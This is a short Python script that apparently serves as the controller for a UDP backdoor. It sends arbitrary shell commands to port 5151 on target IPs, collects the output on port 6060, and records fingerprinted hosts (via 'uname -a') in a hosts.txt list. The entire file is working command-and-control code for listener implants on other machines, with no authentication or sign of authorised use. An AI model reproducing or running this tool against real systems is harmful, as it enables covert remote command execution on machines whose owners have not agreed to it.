#!/usr/bin/python3
import sys, socket

commands = ['execute', 'list', 'listadd']
usageString = ("USAGE: " + sys.argv[0] + " " + str(commands) + " [IP]")

if len(sys.argv) <2:
	print(usageString)
	sys.exit()

def execute(command):
	try:
		ip = sys.argv[2]
		sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
		sock.sendto(bytes(command, 'utf-8'), (ip, 5151))
		respSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
		respSock.bind(('0.0.0.0', 6060))
		respSock.settimeout(15)
		try:
			response = respSock.recvfrom(4096)
			output = response[0]
			print(output.decode('utf-8'))
		except socket.timeout:
			print("UwU, looks like there's no listener")
	
	except socket.gaierror:
		print("OWO (notices lack of internet connection)")
try:
	if sys.argv[1] in commands:
		instruction = sys.argv[1]
		if instruction == 'execute':
			shellCom = sys.argv[3]
			for x in range(4, len(sys.argv)):
				shellCom = shellCom + " " + sys.argv[x]
			execute(shellCom)
		elif instruction == 'list':
			filename = "hosts.txt"
			file = open(filename,'r')
			for line in file:
				print(line)
			file.close
		elif instruction == 'listadd':
			ip = sys.argv[1]
			filename = 'hosts.txt'
			ip = sys.argv[2]
			sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
			sock.sendto(bytes('uname -a', 'utf-8'), (ip, 5151))
			respSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
			respSock.bind(('0.0.0.0', 6060))
			respSock.settimeout(15)
			try:
				data = respSock.recvfrom(4096)
				file = open(filename, 'a')
				osInfo = data[0].decode('utf-8')
				if osInfo != 'oWo naughty, you can\'t do that':
					file.write(ip+"|"+osInfo+"\n")
				else:
					file.write(ip + "|" + 'Windows')
			except socket.timeout:
				print('UWU No listener available')

	else:
		print(usageString)
		sys.exit()
except IndexError:
	print(usageString)
